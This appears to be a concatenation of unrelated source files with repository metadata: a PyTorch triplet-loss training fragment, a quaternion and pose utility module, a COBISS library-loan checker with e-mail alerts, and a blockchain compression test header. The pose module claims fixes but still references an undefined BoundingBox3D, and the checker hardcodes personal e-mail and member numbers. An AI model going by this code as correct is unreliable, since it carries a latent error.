# embedding_net.load_state_dict(torch.load('res_e6.pkl'))
#
model = embedding_net
# torch.save(model.state_dict(), 'res_7.pkl')
# for i in range(1, 6):
#     imodel=model
#     torch.save(imodel.state_dict(), 'res_7.pkl')
# print(model)
# model.load_state_dict(torch.load('res_7.pkl'))

# Training data: random crop/flip augmentation around a 299px Inception input.
train_dataset = MyDataset(root='/home/ubuntu5/yxx/Benchmark_split/Fi/', datatxt='fi_trainimg_label.txt', train=True, transform=transforms.Compose([
    transforms.Scale(356),
    transforms.RandomHorizontalFlip(),
    transforms.RandomCrop(299),
    transforms.ToTensor(),
    #transforms.Normalize((mean,), (std,))
]), target_transform=transforms.Compose([transforms.ToTensor()]))

# Test data: deterministic center crop, no augmentation.
test_dataset = MyDataset(root='/home/ubuntu5/yxx/Benchmark_split/Fi/', datatxt='fi_testimg_label.txt', transform=transforms.Compose([
    # transforms.Resize((28, 28)),
    transforms.Scale(356),
    transforms.CenterCrop(299),
    transforms.ToTensor(),
    #transforms.Normalize((mean,), (std,))
]), target_transform=transforms.Compose([transforms.ToTensor()]))

# Balanced batches: 8 classes x 6 samples per batch for online triplet mining.
train_batch_sampler = BalancedBatchSampler(train_dataset, n_classes=8, n_samples=6)
test_batch_sampler = BalancedBatchSampler(test_dataset, n_classes=8, n_samples=6)

train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=32, shuffle=False, num_workers=8)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=32, shuffle=False)
kwargs = {'num_workers': 6, 'pin_memory': True} if cuda else {}
online_train_loader = torch.utils.data.DataLoader(train_dataset, batch_sampler=train_batch_sampler, **kwargs)
online_test_loader = torch.utils.data.DataLoader(test_dataset, batch_sampler=test_batch_sampler, **kwargs)

# from networks import EmbeddingNet, TripletNet, ResNet
if cuda:
    model.cuda()

# Dual-margin online triplet loss + standard classification loss.
margin1 = 0.2
margin2 = 0.1
loss_fn1 = OnlineTripletLoss(margin1, margin2, SemihardNegativeTripletSelector(margin1, margin2))
loss_fn2 = nn.CrossEntropyLoss()
# SGD with step decay (x0.1 every 40 epochs).
lr = 1e-2
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4, nesterov=True)
scheduler = lr_scheduler.StepLR(optimizer, 40, gamma=0.1, last_epoch=-1)
n_epochs = 100
log_interval = 100
# predict_label1 = filt(test_loader=test_loader, model=model, scheduler=scheduler, num_epochs=1, cuda=cuda)
fit(online_train_loader, online_test_loader, embedding_net, model, loss_fn1, loss_fn2, optimizer, scheduler, n_epochs, cuda, log_interval, metrics=[AccumulatedAccuracyMetric()])
# a,b=extract_embeddings(train_loader,imodel,'./data_fea/res_iap_train_'+str(i)+'.mat')
# c,d=extract_embeddings(test_loader,imodel,'./data_fea/res_iap_test'+str(i)+'.mat')
# del model, embedding_net, loss_fn1, loss_fn2, online_train_loader, online_test_loader
# labels = test_dataset.__labels__()
# labels_list=labels.tolist()
# io.savemat('./pre_label_res/abs_label_'+str(i)+'.mat', {'data':labels_list})
# acc=fitest(test_loader, model, embedding_net, loss_fn2, scheduler, 1, cuda, metrics=[AccumulatedAccuracyMetric()])
# predict_label1 = filt(test_loader=test_loader, model=model, scheduler=scheduler, num_epochs=1, cuda=cuda)
# io.savemat('./pre_label_res/abs_pl_'+str(i)+'.mat', {'data': predict_label1}) #########
# # predict_label1=np.transpose(np.array(predict_label1))
# labels = np.array(labels)
# labels = labels.astype(int)
#
# cmat = confusion_matrix(labels, predict_label1)
# cmats.append(cmat)
# accuracy.append(acc)
# np.save('.pre_label_res/abs_cmats.npy', np.array(cmats))
# np.save('pre_label_res/abs_accs.npy', accuracy)
# for j in range(5):
#     cmat=cmats[j]
#     for i in range(len(cmat)):
#         print(cmat[i] / np.sum(cmat[i]))
#     for i in range(len(cmat)):
#         print((cmat[i] / np.sum(cmat[i]))[i])
# print(accuracy)
#fitest(test_loader, embedding_net, model, loss_fn2, scheduler, n_epochs, cuda, metrics=[AccumulatedAccuracyMetric()])
# train_embeddings_tl,train_labels_tl = extract_embeddings(train_loader,embedding_net)
# val_embeddings_tl,val_labels_tl = extract_embeddingstest(test_loader,embedding_net)
"noreply@github.com"
] | Xingxu1996.noreply@github.com |
bd162ea5c30a6a6a8905b5c33e0068e0a0a682ec | 20cdaa9c53e80fe93718fe989d3c14192cf86e04 | /dgp/utils/torch_extension/pose.py | 184bfe1a8b6894df27cedc9a1a0f51e2d11b651c | [
"MIT"
] | permissive | parallel-domain/dgp | d84de3a9ed14cf1cdbe8903251e20ca1a696f4a1 | ee21c27b3423a23527a28b8433c96ea800315337 | refs/heads/master | 2023-06-27T23:02:46.296109 | 2021-08-03T01:30:41 | 2021-08-03T01:30:41 | 268,911,939 | 0 | 0 | MIT | 2021-08-03T01:30:42 | 2020-06-02T21:24:44 | Python | UTF-8 | Python | false | false | 19,649 | py | # Copyright 2019 Toyota Research Institute. All rights reserved.
"""Torch utilities for rigid-body pose manipulation.
Some of the rotation/quaternion utilities have been borrowed from:
https://github.com/facebookresearch/QuaterNet/blob/master/common/quaternion.py
https://github.com/arraiyopensource/kornia/blob/master/kornia/geometry/conversions.py
"""
import torch
import torch.nn.functional as F
def qmul(q, r):
    """
    Hamilton product q * r of two batches of quaternions.

    Expects two equally-sized tensors of shape (*, 4) in (w, x, y, z)
    order, where * denotes any number of dimensions, and returns q*r
    with the same shape.

    Parameters
    ----------
    q: torch.FloatTensor (B4)
        Input quaternion to use for rotation.
    r: torch.FloatTensor (B4)
        Second quaternion to use for rotation composition.

    Returns
    ----------
    rotated_q: torch.FloatTensor (B4)
        Composed quaternion rotation.
    """
    assert q.shape[-1] == 4
    assert r.shape[-1] == 4
    out_shape = q.shape

    # Unpack components and apply the Hamilton product directly,
    # instead of building the 4x4 outer product.
    qw, qx, qy, qz = torch.unbind(q.reshape(-1, 4), dim=-1)
    rw, rx, ry, rz = torch.unbind(r.reshape(-1, 4), dim=-1)

    ow = qw * rw - qx * rx - qy * ry - qz * rz
    ox = qw * rx + qx * rw + qy * rz - qz * ry
    oy = qw * ry + qy * rw + qz * rx - qx * rz
    oz = qw * rz + qz * rw + qx * ry - qy * rx
    return torch.stack((ow, ox, oy, oz), dim=1).view(out_shape)
def qrot(q, v):
    """
    Rotate vector(s) v by quaternion(s) q, given in (w, x, y, z) order.

    Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3)
    for v, where * denotes any number of dimensions; returns a tensor of
    shape (*, 3). Uses the standard v' = v + 2*(w*(u x v) + u x (u x v))
    identity, where u is the quaternion's vector part.

    Parameters
    ----------
    q: torch.FloatTensor (B4)
        Input quaternion to use for rotation.
    v: torch.FloatTensor (B3)
        Input vector to rotate with.

    Returns
    ----------
    vector: torch.FloatTensor (B3)
        Rotated vector.
    """
    assert q.shape[-1] == 4
    assert v.shape[-1] == 3
    assert q.shape[:-1] == v.shape[:-1]

    out_shape = list(v.shape)
    q_flat = q.reshape(-1, 4)
    v_flat = v.reshape(-1, 3)

    w = q_flat[:, :1]
    u = q_flat[:, 1:]
    uv = torch.cross(u, v_flat, dim=1)
    rotated = v_flat + 2 * (w * uv + torch.cross(u, uv, dim=1))
    return rotated.view(out_shape)
def qinv(q):
    """Returns the quaternion conjugate. (w, x, y, z)

    Fix: the previous implementation negated the vector part *in place*
    (``q[..., -3:] *= -1``) and returned the same tensor, silently
    mutating the caller's quaternion. Now returns a new tensor and
    leaves the input untouched.

    Parameters
    ----------
    quaternion: torch.FloatTensor (B4)
        Input quaternion to invert.

    Returns
    ----------
    quaternion: torch.FloatTensor (B4)
        Inverted (conjugated) quaternion.
    """
    return torch.cat((q[..., :1], -q[..., 1:]), dim=-1)
def quaternion_to_rotation_matrix(quaternion):
    """Converts a quaternion to a rotation matrix.
    The quaternion should be in (w, x, y, z) format.

    Parameters
    ----------
    quaternion: torch.FloatTensor (B4)
        Input quaternion to convert.

    Returns
    ----------
    rotation_matrix: torch.FloatTensor (B33)
        Batched rotation matrix.
    """
    if not isinstance(quaternion, torch.Tensor):
        raise TypeError("Input type is not a torch.Tensor. Got {}".format(
            type(quaternion)))

    if not quaternion.shape[-1] == 4:
        raise ValueError(
            "Input must be a tensor of shape (*, 4). Got {}".format(
                quaternion.shape))
    # normalize the input quaternion
    quaternion_norm = normalize_quaternion(quaternion)

    # unpack the normalized quaternion components
    w, x, y, z = torch.chunk(quaternion_norm, chunks=4, dim=-1)

    # compute the actual conversion (standard quaternion-to-matrix
    # expansion with shared 2*component products)
    tx = 2.0 * x
    ty = 2.0 * y
    tz = 2.0 * z
    twx = tx * w
    twy = ty * w
    twz = tz * w
    txx = tx * x
    txy = ty * x
    txz = tz * x
    tyy = ty * y
    tyz = tz * y
    tzz = tz * z
    one = torch.tensor(1.)

    # Row-major entries of the 3x3 matrix, stacked then reshaped.
    # NOTE(review): view(-1, 3, 3) flattens any extra leading batch dims;
    # for input shape (A, B, 4) the result is (A*B, 3, 3) — confirm callers
    # only pass (B, 4) or (4,).
    matrix = torch.stack([
        one - (tyy + tzz), txy - twz, txz + twy,
        txy + twz, one - (txx + tzz), tyz - twx,
        txz - twy, tyz + twx, one - (txx + tyy)
    ], dim=-1).view(-1, 3, 3)

    if len(quaternion.shape) == 1:
        # Unbatched input -> unbatched (3, 3) output.
        matrix = torch.squeeze(matrix, dim=0)
    return matrix
def rotation_matrix_to_quaternion(rotation_matrix, eps=1e-8):
    """Convert 3x3 rotation matrix to 4d quaternion vector.
    The quaternion vector has components in (w, x, y, z) format.

    Uses Shepperd's method: picks the numerically stable branch based on
    the trace / dominant diagonal element. All four branches are computed
    and selected with torch.where (branchless, autograd-friendly).

    Parameters
    ----------
    rotation_matrix: torch.FloatTensor (B33)
        Input rotation matrix to convert.

    eps: float, default: 1e-8
        Epsilon value to avoid zero division.

    Returns
    ----------
    quaternion: torch.FloatTensor (B4)
        Batched rotation in quaternion.
    """
    if not isinstance(rotation_matrix, torch.Tensor):
        raise TypeError("Input type is not a torch.Tensor. Got {}".format(
            type(rotation_matrix)))

    if not rotation_matrix.shape[-2:] == (3, 3):
        raise ValueError(
            "Input size must be a (*, 3, 3) tensor. Got {}".format(
                rotation_matrix.shape))

    def safe_zero_division(numerator: torch.Tensor,
                           denominator: torch.Tensor) -> torch.Tensor:
        # NOTE(review): this local `eps` shadows the function parameter —
        # division is clamped by the dtype's tiny value, not the caller's eps.
        eps = torch.finfo(numerator.dtype).tiny  # type: ignore
        return numerator / torch.clamp(denominator, min=eps)

    rotation_matrix_vec = rotation_matrix.view(
        *rotation_matrix.shape[:-2], 9)

    m00, m01, m02, m10, m11, m12, m20, m21, m22 = torch.chunk(
        rotation_matrix_vec, chunks=9, dim=-1)

    trace = m00 + m11 + m22

    def trace_positive_cond():
        sq = torch.sqrt(trace + 1.0) * 2.  # sq = 4 * qw.
        qw = 0.25 * sq
        qx = safe_zero_division(m21 - m12, sq)
        qy = safe_zero_division(m02 - m20, sq)
        qz = safe_zero_division(m10 - m01, sq)
        return torch.cat([qw, qx, qy, qz], dim=-1)

    def cond_1():
        # Dominant m00 branch; `+ eps` guards sqrt of a near-zero argument
        # (torch.where evaluates all branches).
        sq = torch.sqrt(1.0 + m00 - m11 - m22 + eps) * 2.  # sq = 4 * qx.
        qw = safe_zero_division(m21 - m12, sq)
        qx = 0.25 * sq
        qy = safe_zero_division(m01 + m10, sq)
        qz = safe_zero_division(m02 + m20, sq)
        return torch.cat([qw, qx, qy, qz], dim=-1)

    def cond_2():
        # Dominant m11 branch.
        sq = torch.sqrt(1.0 + m11 - m00 - m22 + eps) * 2.  # sq = 4 * qy.
        qw = safe_zero_division(m02 - m20, sq)
        qx = safe_zero_division(m01 + m10, sq)
        qy = 0.25 * sq
        qz = safe_zero_division(m12 + m21, sq)
        return torch.cat([qw, qx, qy, qz], dim=-1)

    def cond_3():
        # Dominant m22 branch.
        sq = torch.sqrt(1.0 + m22 - m00 - m11 + eps) * 2.  # sq = 4 * qz.
        qw = safe_zero_division(m10 - m01, sq)
        qx = safe_zero_division(m02 + m20, sq)
        qy = safe_zero_division(m12 + m21, sq)
        qz = 0.25 * sq
        return torch.cat([qw, qx, qy, qz], dim=-1)

    # Select per-element: positive trace first, else the branch of the
    # largest diagonal entry.
    where_2 = torch.where(m11 > m22, cond_2(), cond_3())
    where_1 = torch.where(
        (m00 > m11) & (m00 > m22), cond_1(), where_2)

    quaternion = torch.where(
        trace > 0., trace_positive_cond(), where_1)
    return quaternion
def normalize_quaternion(quaternion, eps=1e-12):
    """Normalizes a quaternion to unit L2 norm along its last axis.
    The quaternion should be in (w, x, y, z) format.

    Parameters
    ----------
    quaternion: torch.FloatTensor (B4)
        Input quaternion to normalize.

    eps: float, default: 1e-12
        Epsilon value to avoid zero division.

    Returns
    ----------
    normalized_quaternion: torch.FloatTensor (B4)
        Normalized quaternion.
    """
    # Guard clauses: type first, then shape, matching the raise order
    # of the other conversion helpers in this module.
    if not isinstance(quaternion, torch.Tensor):
        raise TypeError(
            "Input type is not a torch.Tensor. Got {}".format(type(quaternion)))
    if quaternion.shape[-1] != 4:
        raise ValueError(
            "Input must be a tensor of shape (*, 4). Got {}".format(quaternion.shape))
    return F.normalize(quaternion, dim=-1, p=2, eps=eps)
def invert_pose(T01):
    """Invert homogeneous matrix as a rigid transformation
       T^-1 = [R^T | -R^T * t]

    Parameters
    ----------
    T01: torch.FloatTensor (B44)
        Input batch of transformation tensors.

    Returns
    ----------
    T10: torch.FloatTensor (B44)
        Inverted batch of transformation tensors.
    """
    batch_size = T01.shape[0]
    # Transposed rotation and original translation of each pose.
    R_T = T01[:, :3, :3].transpose(-2, -1)
    t = T01[:, :3, -1]
    # Start from identity so the bottom row [0, 0, 0, 1] is preserved.
    T10 = torch.eye(4, device=T01.device, dtype=T01.dtype).unsqueeze(0).repeat(batch_size, 1, 1)
    T10[:, :3, :3] = R_T
    T10[:, :3, -1] = -(R_T @ t.unsqueeze(-1)).squeeze(-1)
    return T10
class Pose:
    """Generic rigid-body transformation class that operates on the
    appropriately defined manifold.

    Parameters
    ----------
    value: torch.FloatTensor (44, B44)
        Input transformation tensors either batched (B44) or as a single value (44).

    Attributes
    ----------
    value: torch.FloatTensor (B44)
        Input transformation tensor batched (B44)
    """
    def __init__(self, value):
        assert tuple(value.shape[-2:]) == (4, 4)
        # If (4,4) tensor is passed, convert to (1,4,4)
        if value.dim() == 2:
            value = value.unsqueeze(0)
        assert value.dim() == 3
        self.value = value

    def __repr__(self):
        return self.value.__repr__()

    def __len__(self):
        """Batch size of pose tensor"""
        return len(self.value)

    def copy(self):
        # Not implemented yet; kept to preserve the class's public surface.
        raise NotImplementedError()

    @classmethod
    def identity(cls, B=1, device=None, dtype=torch.float):
        """Batch of identity matrices.

        Parameters
        ----------
        B: int
            Batch size.

        Returns
        ----------
        Pose
            Batch of identity transformation poses.
        """
        return cls(torch.eye(4, device=device, dtype=dtype).repeat([B, 1, 1]))

    @property
    def matrix(self):
        """Returns the batched homogeneous matrix as a tensor

        Returns
        ----------
        result: torch.FloatTensor (B44)
            Bx4x4 homogeneous matrix
        """
        return self.value

    @property
    def rotation_matrix(self):
        """Returns the 3x3 rotation matrix (R)

        Returns
        ----------
        result: torch.FloatTensor (B33)
            Bx3x3 rotation matrix
        """
        return self.value[..., :3, :3]

    @property
    def translation(self):
        """Return the translation component of the pose as a torch.Tensor.

        Returns
        ----------
        tvec: torch.FloatTensor (B3)
            Translation component of the Pose object.
        """
        return self.value[..., :3, -1]

    def repeat(self, *args, **kwargs):
        """Repeat the Pose tensor (in place); returns self for chaining."""
        self.value = self.value.repeat(*args, **kwargs)
        return self

    def to(self, *args, **kwargs):
        """Move object to specified device (in place); returns self."""
        self.value = self.value.to(*args, **kwargs)
        return self

    def __mul__(self, other):
        """Matrix multiplication overloading for pose-pose and pose-point
        transformations.

        Fix: the previous implementation tested ``isinstance(other,
        BoundingBox3D)`` but ``BoundingBox3D`` is not defined/imported in
        this module, so reaching that branch raised NameError instead of
        NotImplementedError. Unsupported types now fall through to a
        single NotImplementedError.

        Parameters
        ----------
        other: Pose or torch.FloatTensor
            Either Pose, or 3-D points torch.FloatTensor (B3N or B3HW).

        Returns
        ----------
        Pose
            Transformed pose, or 3-D points via rigid-transform on the manifold,
            with same type as other.
        """
        if isinstance(other, Pose):
            return self.transform_pose(other)
        elif isinstance(other, torch.Tensor):
            if other.shape[1] == 3 and other.dim() > 2:
                assert other.dim() == 3 or other.dim() == 4
                return self.transform_points(other)
            else:
                raise ValueError('Unknown tensor dimensions {}'.format(other.shape))
        else:
            raise NotImplementedError()

    def __rmul__(self, other):
        raise NotImplementedError('Right multiply not implemented yet!')

    def transform_pose(self, other):
        """Left-multiply (oplus) rigid-body transformation.

        Parameters
        ----------
        other: Pose
            Pose to left-multiply with (self * other)

        Returns
        ----------
        Pose
            Transformed Pose via rigid-transform on the manifold.
        """
        assert tuple(other.value.shape[-2:]) == (4, 4)
        return Pose(self.value.bmm(other.value))

    def transform_points(self, X0):
        """Transform 3-D points from one frame to another via rigid-body transformation.

        Parameters
        ----------
        X0: torch.FloatTensor (B3N or B3HW)
            3-D points in torch.FloatTensor (shaped either B3N or B3HW).

        Returns
        ----------
        torch.FloatTensor (B3N or B3HW)
            Transformed 3-D points with the same shape as X0.
        """
        assert X0.shape[1] == 3
        B = len(X0)
        shape = X0.shape[2:]
        # X1 = R * X0 + t, applied over the flattened point dimension.
        X1 = self.value[:, :3, :3].bmm(X0.view(B, 3, -1)) + self.value[:, :3, -1].unsqueeze(-1)
        return X1.view(B, 3, *shape)

    def inverse(self):
        """Invert homogeneous matrix as a rigid transformation.

        Returns
        ----------
        Pose
            Pose batch inverted on the appropriate manifold.
        """
        return Pose(invert_pose(self.value))
class QuaternionPose:
    """Derived Pose class that operates on the quaternion manifold instead.

    Parameters
    ----------
    wxyz: torch.FloatTensor (4, B4)
        Input quaternion tensors either batched (B4) or as a single value (4,).
    tvec: torch.FloatTensor (3, B3)
        Input translation tensors either batched (B3) or as a single value (3,).
    """
    def __init__(self, wxyz, tvec):
        assert wxyz.dim() == tvec.dim(), (
            'Quaternion and translation dimensions are different')
        # If (d) tensors are passed, convert to (B,d) *before* the batch-size
        # check: len() of a 1-D tensor is its element count (4 vs 3), so the
        # original order rejected every unbatched input the docstring accepts.
        if wxyz.dim() == 1:
            wxyz = wxyz.unsqueeze(0)
            tvec = tvec.unsqueeze(0)
        assert len(wxyz) == len(tvec), (
            'Quaternion and translation batch sizes are different')
        assert wxyz.dim() == 2
        self.quat = wxyz
        self.tvec = tvec
    def __len__(self):
        """Batch size of pose tensor"""
        return len(self.quat)
    def __repr__(self):
        # Bug fix: the format string had a single placeholder for two
        # arguments, silently dropping the pose values from the output.
        return 'QuaternionPose: B={}, [qw, qx, qy, qz, x, y, z]={}'.format(
            len(self), torch.cat([self.quat, self.tvec], dim=-1))
    @classmethod
    def identity(cls, B=1, device=None, dtype=torch.float):
        """Batch of identity poses.

        Parameters
        ----------
        B: int
            Batch size.

        Returns
        ----------
        QuaternionPose
            Batch of identity transformation poses.
        """
        # Bug fix: the constructor takes (wxyz, tvec) as two tensors; the
        # original passed a single 7-element tensor, raising TypeError.
        wxyz = torch.tensor([1., 0., 0., 0.], device=device, dtype=dtype).repeat([B, 1])
        tvec = torch.zeros(B, 3, device=device, dtype=dtype)
        return cls(wxyz, tvec)
    @classmethod
    def from_matrix(cls, value):
        """Create a batched QuaternionPose from a batched homogeneous matrix.

        Parameters
        ----------
        value: torch.FloatTensor (B44)
            Batched homogeneous matrix.

        Returns
        ----------
        pose: QuaternionPose with batch B
            QuaternionPose batch.
        """
        if value.dim() == 2:
            value = value.unsqueeze(0)
        wxyz = rotation_matrix_to_quaternion(value[..., :3, :3].contiguous())
        tvec = value[..., :3, -1]
        return cls(wxyz, tvec)
    @property
    def matrix(self):
        """Returns the batched homogeneous matrix as a tensor

        Returns
        ----------
        result: torch.FloatTensor (B44)
            Bx4x4 homogeneous matrix
        """
        R = quaternion_to_rotation_matrix(self.quat)
        T = torch.eye(4, device=R.device, dtype=R.dtype).repeat([len(self), 1, 1])
        T[:, :3, :3] = R
        T[:, :3, -1] = self.tvec
        return T
    @property
    def rotation_matrix(self):
        """Returns the 3x3 rotation matrix (R)

        Returns
        ----------
        result: torch.FloatTensor (B33)
            Bx3x3 rotation matrix
        """
        return quaternion_to_rotation_matrix(self.quat)
    @property
    def translation(self):
        """Return the translation component of the pose as a torch.Tensor.

        Returns
        ----------
        tvec: torch.FloatTensor (B3)
            Translation component of the Pose object.
        """
        return self.tvec
    def repeat(self, B):
        """Repeat the QuaternionPose tensor along the batch dimension."""
        self.quat = self.quat.repeat([B, 1])
        self.tvec = self.tvec.repeat([B, 1])
        assert self.quat.dim() == self.tvec.dim() == 2, (
            'Attempting to repeat along the batch dimension failed, quat/tvec dims: {}/{}'
            .format(self.quat.dim(), self.tvec.dim()))
        return self
    def to(self, *args, **kwargs):
        """Move object to specified device"""
        self.quat = self.quat.to(*args, **kwargs)
        self.tvec = self.tvec.to(*args, **kwargs)
        return self
    def __mul__(self, other):
        """Matrix multiplication overloading for pose-pose and pose-point
        transformations.

        Parameters
        ----------
        other: Pose or torch.FloatTensor
            Either Pose, or 3-D points torch.FloatTensor (B3N or B3HW).

        Returns
        ----------
        Pose
            Transformed pose, or 3-D points via rigid-transform on the manifold,
            with same type as other.
        """
        if isinstance(other, QuaternionPose):
            return self.transform_pose(other)
        elif isinstance(other, torch.Tensor):
            if other.shape[1] == 3 and other.dim() > 2:
                assert other.dim() == 3 or other.dim() == 4
                return self.transform_points(other)
            else:
                raise ValueError('Unknown tensor dimensions {}'.format(other.shape))
        elif isinstance(other, BoundingBox3D):
            raise NotImplementedError()
        else:
            raise NotImplementedError()
    def transform_pose(self, other):
        """Left-multiply (oplus) rigid-body transformation.

        Parameters
        ----------
        other: QuaternionPose
            Pose to left-multiply with (self * other)

        Returns
        ----------
        QuaternionPose
            Transformed Pose via rigid-transform on the manifold.
        """
        assert isinstance(other, QuaternionPose), (
            'Other pose is not QuaternionPose')
        tvec = qrot(self.quat, other.tvec) + self.tvec
        quat = qmul(self.quat, other.quat)
        return self.__class__(quat, tvec)
    def transform_points(self, X0):
        """Transform 3-D points from one frame to another via rigid-body transformation.

        Note: This function can be modified to do batched rotation operation
        with quaternions directly.

        Parameters
        ----------
        X0: torch.FloatTensor (B3N or B3HW)
            3-D points in torch.FloatTensor (shaped either B3N or B3HW).

        Returns
        ----------
        torch.FloatTensor (B3N or B3HW)
            Transformed 3-D points with the same shape as X0.
        """
        assert X0.shape[1] == 3 and len(X0) == len(self), (
            'Batch sizes do not match pose={}, X={}, '.format(self.__repr__(), X0.shape))
        B, shape = len(X0), X0.shape[2:]
        R = quaternion_to_rotation_matrix(self.quat)
        X1 = R.bmm(X0.view(B, 3, -1)) + self.tvec.unsqueeze(-1)
        return X1.view(B, 3, *shape)
    def inverse(self):
        """Invert T=[trans, quaternion] as a rigid transformation.

        Returns:
            QuaternionPose: Pose batch inverted on the appropriate manifold.
        """
        # Bug fix: `qinv = qinv(...)` made `qinv` a local variable, raising
        # UnboundLocalError before the module-level qinv() was ever called.
        quat_inv = qinv(self.quat)
        tvec_inv = qrot(quat_inv, -self.tvec)
        return QuaternionPose(quat_inv, tvec_inv)
| [
"wwwrrry612@gmail.com"
] | wwwrrry612@gmail.com |
367a3facb1999817f6db62d7395cf8ba714284bf | 3e563bd01bf57fa73818e9ddbd61bc15acae3d61 | /library_service.py | 069d08e78dcbb065c75b5daeff3416c3af19d3aa | [] | no_license | jancvek/library-check | 08032548fd6c3a742ad2c039f0bfdca7e73be705 | 5614cab69a205b74c670b67165526e7f9c92402c | refs/heads/master | 2021-06-28T03:00:18.009735 | 2020-10-31T14:05:03 | 2020-10-31T14:05:03 | 228,236,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,444 | py | import time
import datetime
import smtplib
from email.message import EmailMessage
import os
currPath = os.path.dirname(os.path.abspath(__file__))
parentPath = os.path.dirname(currPath)
libPath = parentPath+'/jan-lib'
# tole moramo dodati da lahko importamo py file iz drugih lokacij
import sys
sys.path.insert(1, libPath)
import jan_cobiss
import jan_email
import jan_enum
import jan_sqlite
def _check_account(sqlConn, email, db_user, display_name, member_id):
    """Check one COBISS library account: persist its status to sqlite and
    send an e-mail on error or when a loan is about to expire."""
    cobiss = jan_cobiss.Cobiss(member_id, "knjiga")
    cobiss.checkCobiss()
    with sqlConn:
        params = "created_by_service,library_user,status,days_to_expire,text"
        values = ('1', db_user, str(cobiss.status.name), cobiss.minDays, cobiss.error)
        jan_sqlite.insert_data(sqlConn, 'data', params, values)
    if cobiss.isError:
        print(cobiss.error)
        email.sentEmail(['jan.cvek@gmail.com'], 'Knjiznica API - ERROR!',
                        'Error Knjiznica ' + display_name + ': ' + cobiss.error)
    else:
        if cobiss.status == jan_enum.EStatusLibrary.EXPIRE_SOON:
            email.sentEmail(['jan.cvek@gmail.com'], 'Knjiznica API - VRNI!',
                            'Knjiznica ' + display_name + ' se: ' + str(cobiss.minDays) + ' dni do preteka!')
    print(str(cobiss.minDays))
    print(str(cobiss.status))
def checkLibrary():
    """Check both library accounts against COBISS, log results, and notify.

    The Jan/Masa logic was duplicated verbatim in the original; it is now
    factored into _check_account. The first COBISS query now runs after the
    connection-status prints rather than between them (output order of those
    prints is otherwise unchanged).
    """
    sqlConn = jan_sqlite.create_connection(currPath + "/library.db")
    print(currPath + "/library.db")
    email = jan_email.Email()
    if sqlConn:
        print("sqlConn dela")
    else:
        print("sqlConn ne dela!")
    _check_account(sqlConn, email, 'JAN', 'Jan', "0104232")
    _check_account(sqlConn, email, 'MASA', 'Masa', "0107170")
# This runs only when the file is executed directly, not when imported from other code.
if __name__ == '__main__':
    checkLibrary() | [
"jan.cvek@gmail.com"
] | jan.cvek@gmail.com |
def includeme(config):
    """Include the seasonal sub-modules, demonstrating the different
    relative-include spellings supported by the config object.

    Defect fixed: the `def` line was fused with dataset metadata residue;
    restored as valid Python. Behavior is unchanged.
    """
    config.include(".spring:include")
    config.include(".summer")
    config.include("./autumn")
    config.include("../en/winter")
| [
"ababjam61+github@gmail.com"
] | ababjam61+github@gmail.com |
0b359de6edb5995644e1b492351b5a6eff68069c | 1020a87ba3569c879478b6a88f73da606f204c34 | /tests/generator/test_compression.py | c5c000d40ba6e08eaf9ff7457e1ef520b8fa4ca6 | [
"Apache-2.0"
] | permissive | MIGPOOL/test-blockchain | deeceaa5d7c6d24e528092ef32036aff8149baff | 567fd1265b6a27f2f4e21c7787e39072e4b7c085 | refs/heads/main | 2023-08-22T03:27:19.638361 | 2021-10-26T22:42:42 | 2021-10-26T22:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,156 | py | # flake8: noqa: F501
from dataclasses import dataclass
from typing import List, Any
from unittest import TestCase
from greendoge.full_node.bundle_tools import (
bundle_suitable_for_compression,
compressed_coin_spend_entry_list,
compressed_spend_bundle_solution,
match_standard_transaction_at_any_index,
simple_solution_generator,
spend_bundle_to_serialized_coin_spend_entry_list,
)
from greendoge.full_node.generator import run_generator, create_generator_args
from greendoge.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from greendoge.types.blockchain_format.program import Program, SerializedProgram, INFINITE_COST
from greendoge.types.generator_types import BlockGenerator, CompressorArg, GeneratorArg
from greendoge.types.spend_bundle import SpendBundle
from greendoge.util.byte_types import hexstr_to_bytes
from greendoge.util.ints import uint32
from greendoge.wallet.puzzles.load_clvm import load_clvm
from tests.core.make_block_generator import make_spend_bundle
from clvm import SExp
import io
from clvm.serialize import sexp_from_stream
from clvm_tools import binutils
TEST_GEN_DESERIALIZE = load_clvm("test_generator_deserialize.clvm", package_or_requirement="greendoge.wallet.puzzles")
DESERIALIZE_MOD = load_clvm("greendogelisp_deserialisation.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_PUZZLE = load_clvm("decompress_puzzle.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_CSE = load_clvm("decompress_coin_spend_entry.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_CSE_WITH_PREFIX = load_clvm(
"decompress_coin_spend_entry_with_prefix.clvm", package_or_requirement="greendoge.wallet.puzzles"
)
DECOMPRESS_BLOCK = load_clvm("block_program_zero.clvm", package_or_requirement="greendoge.wallet.puzzles")
TEST_MULTIPLE = load_clvm("test_multiple_generator_input_arguments.clvm", package_or_requirement="greendoge.wallet.puzzles")
Nil = Program.from_bytes(b"\x80")
original_generator = hexstr_to_bytes(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080"
) # noqa
gen1 = b"aaaaaaaaaa" + original_generator
gen2 = b"bb" + original_generator
FAKE_BLOCK_HEIGHT1 = uint32(100)
FAKE_BLOCK_HEIGHT2 = uint32(200)
